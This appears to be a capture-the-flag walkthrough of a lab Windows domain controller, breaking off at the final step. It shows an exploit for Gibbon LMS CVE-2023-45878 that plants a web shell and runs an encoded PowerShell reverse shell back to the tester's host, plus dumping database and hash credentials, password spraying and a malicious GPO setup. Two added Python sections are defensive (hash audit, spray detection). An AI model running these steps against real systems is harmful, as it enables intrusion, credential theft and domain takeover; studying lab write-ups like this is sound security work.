Proof of Concept
10.129.232.168
Nmap
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
Initial Access
Browse the web service on port 80
- Redirected to http://frizzdc.frizz.htb
┌──(kali㉿kali)-[~/TheFrizz]
└─$ curl http://10.129.232.168:80
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://frizzdc.frizz.htb/home/">here</a>.</p>
<hr>
<address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Server at 10.129.232.168 Port 80</address>
</body></html>
Configure the /etc/hosts file
┌──(kali㉿kali)-[~/TheFrizz]
└─$ cat /etc/hosts
<SNIP>
10.129.232.168 frizzdc.frizz.htb frizz.htb
Browse to http://frizzdc.frizz.htb/home
Click the "Staff Login" button
- The page footer shows that Gibbon v25.0.00 is in use
Found a vulnerability in Gibbon LMS that allows creating a PHP file and leads to RCE (CVE-2023-45878)
Download the PoC code
┌──(kali㉿kali)-[~/TheFrizz]
└─$ git clone https://github.com/davidzzo23/CVE-2023-45878.git
Cloning into 'CVE-2023-45878'...
remote: Enumerating objects: 18, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 18 (delta 3), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (18/18), 7.61 KiB | 7.61 MiB/s, done.
Resolving deltas: 100% (3/3), done.
Run the PoC
┌──(kali㉿kali)-[~/TheFrizz/CVE-2023-45878]
└─$ python CVE-2023-45878.py -t 10.129.232.168 -s -i 10.10.14.81 -p 4444
[+] Uploading web shell as jjhntmlr.php...
[+] Upload successful.
[+] Sending PowerShell reverse shell payload to http://10.129.232.168/Gibbon-LMS/jjhntmlr.php
[*] Make sure your listener is running: nc -lvnp 4444
[+] Executing command on: http://10.129.232.168/Gibbon-LMS/jjhntmlr.php?cmd=powershell -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand CgAgACAAIAAgACQAYwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABDAFAAQwBsAGkAZQBuAHQAKAAiADEAMAAuADEAMAAuADEANAAuADgAMQAiACwANAA0ADQANAApADsACgAgACAAIAAgACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AAoAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AAoAIAAgACAAIAB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsACgAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsACgAgACAAIAAgACAAIAAgACAAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAKACAAIAAgACAAIAAgACAAIAAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACcAUABTACAAJwAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACcAPgAgACcAOwAKACAAIAAgACAAIAAgACAAIAAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7AAoAIAAgACAAIAAgACAAIAAgACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAKACAAIAAgACAAIAAgACAAIAAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQA7AAoAIAAgACAAIAB9AAoAIAAgACAAIAAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQAKACAAIAAgACAA
[!] Error connecting to web shell: HTTPConnectionPool(host='10.129.232.168', port=80): Read timed out. (read timeout=5)
Reverse shell connection established
┌──(kali㉿kali)-[~/TheFrizz]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.81] from (UNKNOWN) [10.129.232.168] 61985
whoami
frizz\w.webservice
Auth as f.frizzle
Inspect the config.php file
- Database credentials found
- MrGibbonsDB/MisterGibbs!Parrot!?1
PS C:\xampp\htdocs\Gibbon-LMS> type config.php
<?php
/*
Gibbon, Flexible & Open School System
Copyright (C) 2010, Ross Parker
<SNIP>
/**
* Sets the database connection information.
* You can supply an optional $databasePort if your server requires one.
*/
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';
/**
* Sets a globally unique id, to allow multiple installs on a single server.
*/
$guid = '7y59n5xz-uym-ei9p-7mmq-83vifmtyey2';
Enumerate the tables in the gibbon database via MySQL
- Found the gibbonperson table, which presumably holds account information
PS C:\xampp\mysql\bin> .\mysql.exe -uMrGibbonsDB -pMisterGibbs!Parrot!?1 -e 'show databases;'
Database
gibbon
information_schema
test
PS C:\xampp\mysql\bin> .\mysql.exe -uMrGibbonsDB -pMisterGibbs!Parrot!?1 gibbon -e 'show tables;'
Tables_in_gibbon
gibbonaction
gibbonactivity
gibbonactivityattendance
gibbonactivityslot
gibbonactivitystaff
<SNIP>
gibbonperson
<SNIP>
Found usernames, hashed passwords and salt values in the gibbonperson table
PS C:\xampp\mysql\bin> .\mysql.exe -uMrGibbonsDB -pMisterGibbs!Parrot!?1 gibbon -e 'select username, passwordStrong, passwordStrongSalt from gibbonperson'
username passwordStrong passwordStrongSalt
f.frizzle 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03 /aACFhikmNopqrRTVz2489
Crack the hash
- Jenni_Luvs_Magic23
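Added example (not code from the original writeup): a Python check of the storage scheme the hashcat run below targets. It assumes the stored value is hex(SHA-256(salt || password)), which is what mode 1420 (sha256($salt.$pass)) cracks; the record it audits is constructed from the walkthrough's salt and recovered password so that the audit is self-consistent. The function names, the 64-hex-digit check on the digest (a digest copied with one character dropped can never match, so it is rejected up front), and the scrypt-based hardened alternative are this example's own, not Gibbon's code.

```python
import hashlib
import hmac
import secrets
import string
import time
from typing import List, Optional, Tuple

# Assumed scheme (what hashcat -m 1420 in the walkthrough targets):
#   stored = hex(SHA-256(salt || password))
# A single fast digest with no work factor, which is why rockyou.txt finishes in seconds.


def gibbon_hash(password: str, salt: str) -> str:
    """Hex SHA-256 over salt+password, the sha256($salt.$pass) form of hashcat -m 1420."""
    return hashlib.sha256((salt + password).encode("utf-8")).hexdigest()


def parse_record(line: str) -> Tuple[str, str]:
    """Split a 'digest:salt' line (the hash.txt layout) and require a complete
    64-hex-character SHA-256; a truncated digest is an input error, not a non-match."""
    digest, sep, salt = line.strip().partition(":")
    if not sep:
        raise ValueError("expected 'digest:salt'")
    digest = digest.lower()
    if len(digest) != 64 or any(c not in string.hexdigits for c in digest):
        raise ValueError("digest must be exactly 64 hex characters, got %d" % len(digest))
    return digest, salt


def verify(stored_digest: str, salt: str, candidate: str) -> bool:
    """Constant-time comparison of one candidate against the stored digest."""
    return hmac.compare_digest(gibbon_hash(candidate, salt), stored_digest.lower())


def audit(record: str, wordlist: List[str]) -> Optional[str]:
    """Offline password audit: first wordlist entry that reproduces the record, else None."""
    digest, salt = parse_record(record)
    for word in wordlist:
        if verify(digest, salt, word):
            return word
    return None


# Hardened alternative (this example's suggestion): a memory-hard KDF with a random per-user salt.
def hardened_hash(password: str, salt: bytes) -> bytes:
    return hashlib.scrypt(password.encode("utf-8"), salt=salt, n=2 ** 14, r=8, p=1, dklen=32)


def hardened_verify(stored: bytes, salt: bytes, candidate: str) -> bool:
    return hmac.compare_digest(hardened_hash(candidate, salt), stored)


def guesses_per_second(hash_fn, salt, seconds: float = 0.25) -> float:
    """Rough single-core guess rate, to show the gap between a bare SHA-256 and a KDF."""
    n, end = 0, time.perf_counter() + seconds
    while time.perf_counter() < end:
        hash_fn("candidate%d" % n, salt)
        n += 1
    return n / seconds


if __name__ == "__main__":
    # Constructed record from the walkthrough's salt and recovered password.
    salt = "/aACFhikmNopqrRTVz2489"
    record = gibbon_hash("Jenni_Luvs_Magic23", salt) + ":" + salt
    print("recovered:", audit(record, ["password", "Jenni_Luvs_Magic23"]))
    print("sha256(salt+pass) guesses/s ~ %.0f" % guesses_per_second(gibbon_hash, salt))
    rsalt = secrets.token_bytes(16)
    print("scrypt guesses/s ~ %.0f" % guesses_per_second(hardened_hash, rsalt))
    print("hardened verify:", hardened_verify(hardened_hash("pw", rsalt), rsalt, "pw"))
```

The rate comparison is the point a defender takes from this section: with one SHA-256 per guess the full rockyou.txt list is a trivial workload, whereas a memory-hard KDF at the parameters above turns the same audit into hours.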
┌──(kali㉿kali)-[~/TheFrizz]
└─$ cat hash.txt
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c0:/aACFhikmNopqrRTVz2489
┌──(kali㉿kali)-[~/TheFrizz]
└─$ hashcat -m 1420 hash.txt /usr/share/wordlists/rockyou.txt --quiet
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489:Jenni_Luvs_Magic23
Attempt SSH login
- Password authentication is not possible
┌──(kali🎃kali)-[~/TheFrizz/CVE-2023-45878]
└─$ ssh f.frizzle@10.129.232.168
The authenticity of host '10.129.232.168 (10.129.232.168)' can't be established.
ED25519 key fingerprint is: SHA256:667C2ZBnjXAV13iEeKUgKhu6w5axMrhU346z2L2OE7g
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.232.168' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
f.frizzle@10.129.232.168: Permission denied (gssapi-with-mic,keyboard-interactive).
Generate a krb5.conf file for the f.frizzle account
┌──(kali🎃kali)-[~/TheFrizz/CVE-2023-45878]
└─$ sudo timedatectl set-ntp off
┌──(kali🎃kali)-[~/TheFrizz/CVE-2023-45878]
└─$ sudo rdate -n 10.129.232.168
Fri Jan 23 03:39:35 EST 2026
┌──(kali🎃kali)-[~/TheFrizz]
└─$ nxc smb frizzdc.frizz.htb -u 'f.frizzle' -p 'Jenni_Luvs_Magic23' --generate-krb5-file krb5conf -k
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB frizzdc.frizz.htb 445 frizzdc [+] frizz.htb\f.frizzle:Jenni_Luvs_Magic23
┌──(kali🎃kali)-[~/TheFrizz]
└─$ cat krb5conf
[libdefaults]
dns_lookup_kdc = false
dns_lookup_realm = false
default_realm = FRIZZ.HTB
[realms]
FRIZZ.HTB = {
kdc = frizzdc.frizz.htb
admin_server = frizzdc.frizz.htb
default_domain = frizz.htb
}
[domain_realm]
.frizz.htb = FRIZZ.HTB
frizz.htb = FRIZZ.HTB
Obtain a Kerberos TGT
┌──(kali🎃kali)-[~/TheFrizz]
└─$ export KRB5_CONFIG=krb5conf
┌──(kali🎃kali)-[~/TheFrizz]
└─$ kinit f.frizzle@FRIZZ.HTB
Password for f.frizzle@FRIZZ.HTB:
┌──(kali🎃kali)-[~/TheFrizz]
└─$ klist
Ticket cache: FILE:f.frizzle.ccache
Default principal: f.frizzle@FRIZZ.HTB
Valid starting Expires Service principal
01/23/2026 10:21:26 01/23/2026 20:21:26 krbtgt/FRIZZ.HTB@FRIZZ.HTB
renew until 01/24/2026 10:21:21
SSH login succeeds via Kerberos authentication
┌──(kali🎃kali)-[~/TheFrizz]
└─$ ssh f.frizzle@frizzdc.frizz.htb -K
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
PowerShell 7.4.5
PS C:\Users\f.frizzle>
Read user.txt
PS C:\Users\f.frizzle\Desktop> type user.txt
25a7bdc579688ea250ca01de1768cf1a
PS C:\Users\f.frizzle\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::6ccd:20b4:a0a0:3e99
Link-local IPv6 Address . . . . . : fe80::4242:f2e0:ab4f:bae4%5
IPv4 Address. . . . . . . . . . . : 10.129.232.168
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%5
10.129.0.1
Auth as M.SchoolBus
Found the directory S-1-5-21-2386970044-1145388522-2932701813-1103 in C:\$RECYCLE.BIN
PS C:\> cd 'C:\$RECYCLE.BIN'
PS C:\$RECYCLE.BIN> ls -force
Directory: C:\$RECYCLE.BIN
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 10/29/2024 7:31 AM S-1-5-21-2386970044-1145388522-2932701813-1103
Two 7z files found inside that directory
PS C:\$RECYCLE.BIN> cd .\S-1-5-21-2386970044-1145388522-2932701813-1103\
PS C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103> ls -force
Directory: C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/29/2024 7:31 AM 148 $IE2XMEG.7z
-a---- 10/24/2024 9:16 PM 30416987 $RE2XMEG.7z
-a-hs- 10/29/2024 7:31 AM 129 desktop.ini
Transfer the $RE2XMEG.7z file to Kali Linux
The authenticity of host '10.10.14.81 (10.10.14.81)' can't be established.
ED25519 key fingerprint is SHA256:C/sPlE+2KjQOvOF6Xgy+YaE8+67OyeJHsui04dPIApU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])?
Warning: Permanently added '10.10.14.81' (ED25519) to the list of known hosts.
kali@10.10.14.81's password:
$RE2XMEG.7z 100% 29MB 3.6MB/s 00:08
Extract the $RE2XMEG.7z archive
┌──(kali🎃kali)-[~/TheFrizz/recover]
└─$ 7z e \$RE2XMEG.7z
7-Zip 25.01 (x64) : Copyright (c) 1999-2025 Igor Pavlov : 2025-08-03
64-bit locale=en_US.UTF-8 Threads:32 OPEN_MAX:1024, ASM
Scanning the drive for archives:
1 file, 30416987 bytes (30 MiB)
Extracting archive: $RE2XMEG.7z
--
Path = $RE2XMEG.7z
Type = 7z
Physical Size = 30416987
Headers Size = 65880
Method = ARM64 LZMA2:26 LZMA:20 BCJ2
Solid = +
Blocks = 3
Would you like to replace the existing file:
Path: ./REQUESTED
Size: 0 bytes
Modified: 2024-09-10 19:25:32
with the file from archive:
Path: wapt/lib/site-packages/Babel-2.9.1.dist-info/REQUESTED
Size: 0 bytes
Modified: 2024-09-10 19:25:36
? (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? A
Everything is Ok
Folders: 684
Files: 5384
Size: 141187501
Compressed: 30416987
Search the extracted files for passwords
- Found a Base64-encoded password in ./waptserver.ini and decoded it to obtain the plaintext password
- !suBcig@MehTed!R
┌──(kali🎃kali)-[~/TheFrizz/recover]
└─$ grep -i -r password .
grep: ./_md4.cpython-38.pyc: binary file matches
grep: ./securetransport.cpython-38.pyc: binary file matches
grep: ./_hashlib.pyd: binary file matches
grep: ./errorcodes.cpython-38.pyc: binary file matches
grep: ./wmi.cpython-38.pyc: binary file matches
grep: ./wgetwads32.exe: binary file matches
grep: ./win32serviceutil.cpython-38.pyc: binary file matches
grep: ./_ntlm.cpython-38.pyc: binary file matches
grep: ./signer.cpython-38.pyc: binary file matches
grep: ./pyadconstants.cpython-38.pyc: binary file matches
grep: ./_negotiate.cpython-38.pyc: binary file matches
grep: ./win32ras.pyd: binary file matches
grep: ./libssl-3.dll: binary file matches
grep: ./sha2_crypt.cpython-38.pyc: binary file matches
<SNIP>
./waptserver.ini:wapt_password = IXN1QmNpZ0BNZWhUZWQhUgo=
<SNIP>
┌──(kali🎃kali)-[~/TheFrizz/recover]
└─$ echo IXN1QmNpZ0BNZWhUZWQhUgo= | base64 -d
!suBcig@MehTed!R
Extract the user list
┌──(kali🎃kali)-[~/TheFrizz/recover]
└─$ nxc smb frizzdc.frizz.htb -u 'f.frizzle' -p 'Jenni_Luvs_Magic23' -k --users-export users.txt
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB frizzdc.frizz.htb 445 frizzdc [+] frizz.htb\f.frizzle:Jenni_Luvs_Magic23
SMB frizzdc.frizz.htb 445 frizzdc -Username- -Last PW Set- -BadPW- -Description-
SMB frizzdc.frizz.htb 445 frizzdc Administrator 2025-02-25 21:24:10 0 Built-in account for administering the computer/domain
SMB frizzdc.frizz.htb 445 frizzdc Guest <never> 0 Built-in account for guest access to the computer/domain
SMB frizzdc.frizz.htb 445 frizzdc krbtgt 2024-10-29 14:19:54 0 Key Distribution Center Service Account
SMB frizzdc.frizz.htb 445 frizzdc f.frizzle 2024-10-29 14:27:03 0 Wizard in Training
SMB frizzdc.frizz.htb 445 frizzdc w.li 2024-10-29 14:27:03 0 Student
SMB frizzdc.frizz.htb 445 frizzdc h.arm 2024-10-29 14:27:03 0 Student
SMB frizzdc.frizz.htb 445 frizzdc M.SchoolBus 2024-10-29 14:27:03 0 Desktop Administrator
SMB frizzdc.frizz.htb 445 frizzdc d.hudson 2024-10-29 14:27:03 0 Student
SMB frizzdc.frizz.htb 445 frizzdc k.franklin 2024-10-29 14:27:03 0 Student
SMB frizzdc.frizz.htb 445 frizzdc l.awesome 2024-10-29 14:27:03 0 Student
SMB frizzdc.frizz.htb 445 frizzdc t.wright 2024-10-29 14:27:03 0 Student
SMB frizzdc.frizz.htb 445 frizzdc r.tennelli 2024-10-29 14:27:04 0 Student
SMB frizzdc.frizz.htb 445 frizzdc J.perlstein 2024-10-29 14:27:04 0 Student
SMB frizzdc.frizz.htb 445 frizzdc a.perlstein 2024-10-29 14:27:04 0 Student
SMB frizzdc.frizz.htb 445 frizzdc p.terese 2024-10-29 14:27:04 0 Student
SMB frizzdc.frizz.htb 445 frizzdc v.frizzle 2024-10-29 14:27:04 0 The Wizard
SMB frizzdc.frizz.htb 445 frizzdc g.frizzle 2024-10-29 14:27:04 0 Student
SMB frizzdc.frizz.htb 445 frizzdc c.sandiego 2024-10-29 14:27:04 0 Student
SMB frizzdc.frizz.htb 445 frizzdc c.ramon 2024-10-29 14:27:04 0 Student
SMB frizzdc.frizz.htb 445 frizzdc m.ramon 2024-10-29 14:27:04 0 Student
SMB frizzdc.frizz.htb 445 frizzdc w.Webservice 2024-10-29 14:27:04 0 Service for the website
SMB frizzdc.frizz.htb 445 frizzdc [*] Enumerated 21 local users: frizz
SMB frizzdc.frizz.htb 445 frizzdc [*] Writing 21 local users to users.txt
Perform a password spraying attack
- Authentication succeeded as M.SchoolBus:!suBcig@MehTed!R
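Added example, not part of the original writeup: what the spray below looks like from the domain controller's side, and a detection rule over it. Because nxc is run with -k, every guess is a Kerberos AS-REQ, so the DC records event 4771 (Kerberos pre-authentication failed) with failure code 0x18 for KDC_ERR_PREAUTH_FAILED and 0x12 for KDC_ERR_CLIENT_REVOKED (the two results in the nxc output), and a 4768 (TGT issued) for the account that succeeds; the NTLM-oriented events 4625 and 4776 are never generated. The records, their field names, the client address format and the thresholds are this example's constructed assumptions; a real SIEM export will need its own field mapping.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample records modelled on DC Security events 4771 (pre-auth failed)
# and 4768 (TGT requested). Field names are this example's own assumption.
FAILURE_CODES = {
    "0x18": "KDC_ERR_PREAUTH_FAILED (wrong password)",
    "0x12": "KDC_ERR_CLIENT_REVOKED (disabled or locked account)",
}

SAMPLE_EVENTS = [
    {"time": "2026-01-24T10:00:01", "event_id": 4771, "account": "Administrator", "client": "::ffff:10.10.14.81", "status": "0x18"},
    {"time": "2026-01-24T10:00:01", "event_id": 4771, "account": "Guest", "client": "::ffff:10.10.14.81", "status": "0x12"},
    {"time": "2026-01-24T10:00:02", "event_id": 4771, "account": "f.frizzle", "client": "::ffff:10.10.14.81", "status": "0x18"},
    {"time": "2026-01-24T10:00:02", "event_id": 4771, "account": "w.li", "client": "::ffff:10.10.14.81", "status": "0x18"},
    {"time": "2026-01-24T10:00:03", "event_id": 4771, "account": "h.arm", "client": "::ffff:10.10.14.81", "status": "0x18"},
    {"time": "2026-01-24T10:00:03", "event_id": 4768, "account": "M.SchoolBus", "client": "::ffff:10.10.14.81", "status": "0x0"},
    # One mistyped password from a workstation: not a spray.
    {"time": "2026-01-24T10:02:10", "event_id": 4771, "account": "t.wright", "client": "::ffff:10.10.20.5", "status": "0x18"},
    # Another failure from that host an hour later: outside the window, must not count.
    {"time": "2026-01-24T11:05:00", "event_id": 4771, "account": "d.hudson", "client": "::ffff:10.10.20.5", "status": "0x18"},
]


def normalize_client(addr: str) -> str:
    """Windows writes IPv4 clients as IPv4-mapped IPv6 (::ffff:a.b.c.d); strip the prefix."""
    return addr[7:] if addr.startswith("::ffff:") else addr


def detect_spray(events: List[Dict], window: timedelta = timedelta(minutes=5),
                 min_accounts: int = 5) -> List[Dict]:
    """Alert when one client fails pre-auth for >= min_accounts distinct accounts inside window.
    Distinct accounts per source is the spray signature; a brute force against one account
    would trip a lockout rule instead."""
    failures = defaultdict(list)
    for e in events:
        if e["event_id"] == 4771:
            failures[normalize_client(e["client"])].append((datetime.fromisoformat(e["time"]), e["account"]))
    alerts = []
    for client, items in failures.items():
        items.sort()
        start = 0
        for end in range(len(items)):
            while items[end][0] - items[start][0] > window:  # slide the window forward
                start += 1
            accounts = sorted({a for _, a in items[start:end + 1]})
            if len(accounts) >= min_accounts:
                alerts.append({"client": client, "accounts": accounts,
                               "first": items[start][0].isoformat(), "last": items[end][0].isoformat()})
                break
    return alerts


def compromised_accounts(events: List[Dict], alerts: List[Dict],
                         grace: timedelta = timedelta(hours=1)) -> List[str]:
    """Accounts that obtained a TGT (4768) from a spraying client during or shortly after
    the spray: the credentials to reset first."""
    spray_start = {a["client"]: datetime.fromisoformat(a["first"]) for a in alerts}
    hits = set()
    for e in events:
        if e["event_id"] != 4768:
            continue
        client = normalize_client(e["client"])
        t = datetime.fromisoformat(e["time"])
        if client in spray_start and spray_start[client] <= t <= spray_start[client] + grace:
            hits.add(e["account"])
    return sorted(hits)


if __name__ == "__main__":
    found = detect_spray(SAMPLE_EVENTS)
    for a in found:
        print("spray from %s: %d accounts between %s and %s" % (a["client"], len(a["accounts"]), a["first"], a["last"]))
    print("accounts to reset:", compromised_accounts(SAMPLE_EVENTS, found))
```

The 0x12 result for Guest and krbtgt in the nxc output is worth keeping in the rule rather than filtering it out: a disabled account being tried alongside live ones is itself a sign that the source is working from an exported user list rather than a typo.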
┌──(kali🎃kali)-[~/TheFrizz/recover]
└─$ nxc smb frizzdc.frizz.htb -u users.txt -p '!suBcig@MehTed!R' -k -t 100
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\Administrator:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\Guest:!suBcig@MehTed!R KDC_ERR_CLIENT_REVOKED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\krbtgt:!suBcig@MehTed!R KDC_ERR_CLIENT_REVOKED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\f.frizzle:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\w.li:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\h.arm:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [+] frizz.htb\M.SchoolBus:!suBcig@MehTed!R
SSH in as M.SchoolBus using the same method as for the f.frizzle account
┌──(kali🎃kali)-[~/TheFrizz]
└─$ sudo rdate -n 10.129.232.168
[sudo] password for kali:
rdate: Inconsistent times received from NTP server
rdate: Unable to get a reasonable time estimate
┌──(kali🎃kali)-[~/TheFrizz]
└─$ nxc smb frizzdc.frizz.htb -u 'M.SchoolBus' -p '!suBcig@MehTed!R' --generate-krb5-file krb5conf2 -k
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB frizzdc.frizz.htb 445 frizzdc [+] frizz.htb\M.SchoolBus:!suBcig@MehTed!R
┌──(kali🎃kali)-[~/TheFrizz]
└─$ export KRB5_CONFIG=krb5conf2
┌──(kali🎃kali)-[~/TheFrizz]
└─$ kinit M.SchoolBus@FRIZZ.HTB
Password for M.SchoolBus@FRIZZ.HTB:
┌──(kali🎃kali)-[~/TheFrizz]
└─$ ssh -K M.SchoolBus@FRIZZ.HTB
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
PowerShell 7.4.5
PS C:\Users\M.SchoolBus>
Privilege Escalation
Collect BloodHound data
- The user M.SCHOOLBUS@FRIZZ.HTB has the permissions to modify the gPLink attribute of OU DOMAIN CONTROLLERS@FRIZZ.HTB. → The ability to alter the gPLink attribute may allow an attacker to apply a malicious Group Policy Object (GPO) to all child user and computer objects (including the ones located in nested OUs). This can be exploited to make said child objects execute arbitrary commands through an immediate scheduled task, thus compromising them.
┌──(kali🎃kali)-[~/TheFrizz/recover]
└─$ nxc ldap frizzdc.frizz.htb -u 'M.SchoolBus' -p '!suBcig@MehTed!R' -k --bloodhound -c All --dns-server 10.129.232.168
LDAP frizzdc.frizz.htb 389 FRIZZDC [*] None (name:FRIZZDC) (domain:frizz.htb)
LDAP frizzdc.frizz.htb 389 FRIZZDC [+] frizz.htb\M.SchoolBus:!suBcig@MehTed!R
LDAP frizzdc.frizz.htb 389 FRIZZDC Resolved collection methods: localadmin, rdp, objectprops, session, group, psremote, container, trusts, acl, dcom
LDAP frizzdc.frizz.htb 389 FRIZZDC Using kerberos auth without ccache, getting TGT
[19:08:56] ERROR Unhandled exception in computer frizzdc.frizz.htb processing: The NETBIOS computers.py:268
connection with the remote host timed out.
LDAP frizzdc.frizz.htb 389 FRIZZDC Done in 00M 25S
LDAP frizzdc.frizz.htb 389 FRIZZDC Compressing output into /home/kali/.nxc/logs/FRIZZDC_frizzdc.frizz.htb_2026-01-24_190830_bloodhound.zip
Create a new GPO named EvilGPO and link it to the Domain Controllers OU
PS C:\Users\M.SchoolBus\Desktop> New-GPO -Name "EvilGPO"
DisplayName : EvilGPO
DomainName : frizz.htb
Owner : frizz\M.SchoolBus
Id : da1f3942-ec4a-462d-b0bf-f215b41a5dfb
GpoStatus : AllSettingsEnabled
Description :
CreationTime : 1/25/2026 4:50:05 AM
ModificationTime : 1/25/2026 4:50:06 AM
UserVersion :
ComputerVersion :
WmiFilter :
PS C:\Users\M.SchoolBus\Desktop> New-GPLink -Name "EvilGPO" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
GpoId : da1f3942-ec4a-462d-b0bf-f215b41a5dfb
DisplayName : EvilGPO
Enabled : True
Enforced : False
Target : OU=Domain Controllers,DC=frizz,DC=htb
Order : 2
Use SharpGPOAbuse to add a scheduled task to EvilGPO that launches a reverse shell, then force the GPO to apply with gpupdate
